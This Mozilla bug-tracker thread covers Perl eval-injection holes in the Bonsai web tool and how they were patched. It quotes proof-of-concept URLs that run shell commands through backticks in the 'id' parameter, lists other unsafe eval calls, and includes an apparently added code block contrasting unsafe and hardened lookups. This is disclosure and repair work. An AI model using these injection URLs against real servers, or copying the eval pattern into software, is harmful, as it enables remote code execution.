Closed Bug 163573 Opened 23 years ago Closed 23 years ago

CSS problems in bonsai

Categories

(Webtools Graveyard :: Bonsai, defect)

defect
Not set
critical

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: tara, Assigned: tara)

Attachments

(2 files)

This patch has fixes for the first four vulnerabilities listed in the bugtraq report. The cvsblame.cgi portion of the patch may not apply (I hacked it manually with the spelling fix in the latest revision, which CVS may not like).
*** Bug 155493 has been marked as a duplicate of this bug. ***
*** Bug 155659 has been marked as a duplicate of this bug. ***
Adding comment from duped bug for centralization purposes:

There seems to be a dangerous bug in bonsai which allows execution of arbitrary code on the web server with the privileges of the web server. The problem is in file editcheckin.cgi on the line:

my $info = eval("\\%" . $::FORM{'id'});

I run a little modified bonsai so I am not completely sure it will work on the genuine bonsai but probably it will work.

So the problem is eval executes backticks (``).

The following URL:
--------------------------------
http://bonsai/editcheckin.cgi?id=$a=%22a%22;$b=%60echo%20%22Content-type:%20text/html\n\ngeorgi%22%20%3E/tmp/georgi%60;print%20$b;$g=%22a%22
---------------------------------
evals the following
-----------------------------
$a="a";$b=`echo "Content-type: text/html\n\ngeorgi" >/tmp/georgi`;print $b;$g="a";
-----------------------------
and creates a file /tmp/georgi

The following URL:
-----------------------------
http://bonsai/editcheckin.cgi?id=$a=%22a%22;$b=%60cat%20/tmp/georgi%60;print%20$b;$g=%22a%22
------------------------------
does cat /tmp/georgi

A quick grep for eval shows also the following potentially dangerous evals:

addcheckin.pl:189: $info = eval("\\\%$id");
addcheckin.pl:208: if ((eval("\$$i" . "{person}") eq $name) &&
adminfuncs.pl:45: my $info = eval("\\\%$checkin");
cvsblame.cgi:493: l.document.write(eval("log" + revToName(rev)) + "</TD></TR></TABLE>");
doeditcheckin.cgi:44: $info = eval("\\%" . $::FORM{'id'});
dotweak.cgi:80: my $info = eval("\\%" . $i);
dotweak.cgi:89: my $info = eval("\\%" . $i);
editcheckin.cgi:38:my $info = eval("\\%" . $::FORM{'id'});
globals.pl:218:## correctly when eval'ed
globals.pl:249: my $value = eval($name);
repophook.cgi:95: $info = eval("\\\%$id");
showcheckins.cgi:64: $info = eval("\\\%$checkin");
showcheckins.cgi:81: $info = eval("\\\%$checkin");
showcheckins.cgi:108: my $aref = eval("\\\%$a");
showcheckins.cgi:109: my $bref = eval("\\\%$b");
showcheckins.cgi:130: $info = eval("\\\%$infoname");
showcheckins.cgi:209: $info = eval("\\\%$checkin");
toplevel.cgi:109: my $info = eval("\\\%$checkin");
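The string-eval lookup quoted in the comment above, next to a lookup that never compiles request input, as an added example (not Bonsai's code and not the patch attached to this bug). The checkin_<digits> naming scheme, the function names and the sample hash are assumptions.

```perl
#!/usr/bin/perl
# Added illustration, not Bonsai's code. The naming scheme
# (%::checkin_<digits>) and the sample data below are assumptions.
use strict;
use warnings;

# Constructed sample data: one package-global hash per checkin, the layout
# that eval("\\%" . $id) is used to reach.
our %checkin_1 = (person => 'tara', log => 'spelling fix');

# Pattern from the report: the request parameter is compiled and run as
# Perl, so any expression placed in $id executes as the web server user.
sub lookup_unsafe {
    my ($id) = @_;
    return eval("\\%" . $id);
}

# Hardened: accept only names of the expected shape, then fetch the hash
# through the symbol table. Nothing from the request is ever compiled.
sub lookup_safe {
    my ($id) = @_;
    return unless defined $id && $id =~ /\A(?:::)?(checkin_[0-9]+)\z/;
    my $name = $1;
    return unless exists $main::{$name};   # no such global: reject
    no strict 'refs';
    return *{"main::$name"}{HASH};         # hash ref, or undef if no hash slot
}

# Constructed inputs: a valid id, an unknown id, and an id carrying code.
for my $id ('::checkin_1', '::checkin_2', 'checkin_1; print 1') {
    my $info = lookup_safe($id);
    printf "%-22s => %s\n", $id,
        $info ? "person=$info->{person}" : 'rejected';
}
```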
Comment on attachment 95950: patch v1: fixes for the first four reported vulnerabilities

tested and happy
Attachment #95950 - Flags: review+
I can't reproduce the last three reported vulnerabilities on bonsai.mozilla.org. Can anyone else?
Checked in first patch:

Checking in cvslog.cgi;
/cvsroot/mozilla/webtools/bonsai/cvslog.cgi,v <-- cvslog.cgi
new revision: 1.18; previous revision: 1.17
done
Checking in cvsblame.cgi;
/cvsroot/mozilla/webtools/bonsai/cvsblame.cgi,v <-- cvsblame.cgi
new revision: 1.33; previous revision: 1.32
done
Checking in globals.pl;
/cvsroot/mozilla/webtools/bonsai/globals.pl,v <-- globals.pl
new revision: 1.16; previous revision: 1.15
done
Attachment #95985 - Flags: review+
I've tried 3 different browsers looking for georgi, and natch.
Survey says we seem to be in good shape.
um, when I said "in good shape" I meant "I'm going to close this bug now"
Status: NEW → RESOLVED
Closed: 23 years ago
Resolution: --- → FIXED
Checking in cvsqueryform.cgi;
/cvsroot/mozilla/webtools/bonsai/cvsqueryform.cgi,v <-- cvsqueryform.cgi
new revision: 1.15; previous revision: 1.14
done
Checking in showcheckins.cgi;
/cvsroot/mozilla/webtools/bonsai/showcheckins.cgi,v <-- showcheckins.cgi
new revision: 1.11; previous revision: 1.10
done
Product: Webtools → Webtools Graveyard